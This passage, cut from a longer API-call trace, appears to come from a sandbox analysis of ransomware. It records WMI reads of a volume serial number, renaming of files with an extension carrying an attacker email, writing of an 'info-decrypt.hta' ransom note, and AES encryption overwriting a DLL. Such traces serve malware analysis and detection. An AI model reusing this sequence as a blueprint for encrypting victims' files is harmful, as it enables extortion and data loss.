ppvObject=0x6d8e9a4*=0x603373c) returned 0x0 [0202.966] WbemLocator:IUnknown:AddRef (This=0x603373c) returned 0x4 [0202.966] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x3 [0202.966] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x2 [0202.966] SysStringLen (param_1=0x0) returned 0x0 [0202.966] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0202.966] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0202.966] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.966] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0202.966] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0202.966] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b514) returned 0x0 [0202.966] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x3 [0202.966] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0202.966] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0202.966] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.966] IWbemServices:GetObject (in: This=0x603373c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6027b20, ppCallResult=0x0) returned 0x0 [0203.069] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a060, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0203.069] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0203.069] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.069] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36bf9cc*=0, plFlavor=0x36bf9d0*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36bf9cc*=8, plFlavor=0x36bf9d0*=0) returned 0x0 [0203.070] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.070] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.070] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36bf9cc*=8, plFlavor=0x36bf9d0*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36bf9cc*=8, plFlavor=0x36bf9d0*=0) returned 0x0 [0203.070] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.070] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.070] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0203.070] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x60 [0203.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0203.070] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x31f149a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0203.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0203.070] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0203.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0203.071] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help", lpFilePart=0x0) returned 0x33 [0203.071] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", lpFilePart=0x0) returned 0x34 [0203.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0203.072] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.072] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxds.dll", cAlternateFileName="")) returned 1 [0203.072] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITIRCL55.DLL", cAlternateFileName="")) returned 1 [0203.072] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msitss55.dll", cAlternateFileName="")) returned 1 [0203.072] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0203.072] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0203.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0203.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0203.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0203.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help", lpFilePart=0x0) returned 0x33 [0203.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", lpFilePart=0x0) returned 0x34 [0203.074] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0203.074] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.074] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxds.dll", cAlternateFileName="")) returned 1 [0203.074] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITIRCL55.DLL", cAlternateFileName="")) returned 1 [0203.074] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msitss55.dll", cAlternateFileName="")) returned 1 [0203.074] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msitss55.dll", cAlternateFileName="")) returned 0 [0203.074] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0203.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0203.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0203.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpFilePart=0x0) returned 0x3c [0203.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", lpFilePart=0x0) returned 0x44 [0203.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0203.075] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0203.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0203.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpFilePart=0x0) returned 0x3c [0203.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta", lpFilePart=0x0) returned 0x44 [0203.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecac) returned 1 [0203.075] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0203.075] GetFileType (hFile=0x32c) returned 0x1 [0203.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca8) returned 1 [0203.076] GetFileType (hFile=0x32c) returned 0x1 [0203.076] WriteFile (in: hFile=0x32c, lpBuffer=0x36c92bc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed70, lpOverlapped=0x0 | out: lpBuffer=0x36c92bc*, lpNumberOfBytesWritten=0x6d8ed70*=0x1000, lpOverlapped=0x0) returned 1 [0203.077] WriteFile (in: hFile=0x32c, lpBuffer=0x36c92bc*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed44, lpOverlapped=0x0 | out: lpBuffer=0x36c92bc*, lpNumberOfBytesWritten=0x6d8ed44*=0x55e, lpOverlapped=0x0) returned 1 [0203.077] CloseHandle (hObject=0x32c) returned 1 [0203.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpFilePart=0x0) returned 0x3c [0203.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0203.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), fInfoLevelId=0x0, lpFileInformation=0x36ca2d8 | out: lpFileInformation=0x36ca2d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200)) returned 1 [0203.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0203.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpFilePart=0x0) returned 0x3c [0203.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0203.078] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0203.078] GetFileType (hFile=0x32c) returned 0x1 [0203.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0203.078] GetFileType (hFile=0x32c) returned 0x1 [0203.078] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x133200 [0203.081] ReadFile (in: hFile=0x32c, lpBuffer=0xa620488, nNumberOfBytesToRead=0x133200, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0xa620488*, lpNumberOfBytesRead=0x6d8edac*=0x133200, lpOverlapped=0x0) returned 1 [0203.160] CloseHandle (hObject=0x32c) returned 1 [0203.161] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdf7b0) returned 1 [0203.162] CryptGenRandom (in: hProv=0xbdf7b0, dwLen=0x10, pbBuffer=0x36cab70 | out: pbBuffer=0x36cab70) returned 1 [0203.884] CryptImportKey (in: hProv=0xbdf7b0, pbData=0x37abe84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f510) returned 1 [0203.884] CryptContextAddRef (hProv=0xbdf7b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.884] CryptContextAddRef (hProv=0xbdf7b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.885] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7fa10) returned 1 [0203.885] CryptContextAddRef (hProv=0xbdf7b0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.885] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x4, pbData=0x37abf64*=0x1, dwFlags=0x0) returned 1 [0203.885] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x1, pbData=0x37abf30, dwFlags=0x0) returned 1 [0203.889] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xa7536a8*, pdwDataLen=0x6d8ed78*=0x133210, dwBufLen=0x133210 | out: pbData=0xa7536a8*, pdwDataLen=0x6d8ed78*=0x133210) returned 1 [0203.903] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37abf8c*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x37abf8c*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0203.905] CryptDestroyKey (hKey=0xb7f510) returned 1 [0203.905] CryptReleaseContext (hProv=0xbdf7b0, dwFlags=0x0) returned 1 [0203.905] CryptReleaseContext (hProv=0xbdf7b0, dwFlags=0x0) returned 1 [0203.905] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpFilePart=0x0) returned 0x3c [0203.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0203.905] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0203.908] GetFileType (hFile=0x32c) returned 0x1 [0203.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0203.908] GetFileType (hFile=0x32c) returned 0x1 [0203.908] WriteFile (in: hFile=0x32c, lpBuffer=0x37ac598*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x37ac598*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0203.910] CloseHandle (hObject=0x32c) returned 1 [0203.911] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0203.911] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0203.911] CoTaskMemFree (pv=0xbed438) [0203.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.911] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0203.911] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0203.911] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0203.911] IUnknown:Release (This=0xb51e34) returned 0x1 [0203.913] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60278f0) returned 0x0 [0203.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0203.913] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6029f10) returned 0x0 [0203.913] WbemDefPath:IUnknown:Release (This=0x60278f0) returned 0x0 [0203.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6029f10) returned 0x0 [0203.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, 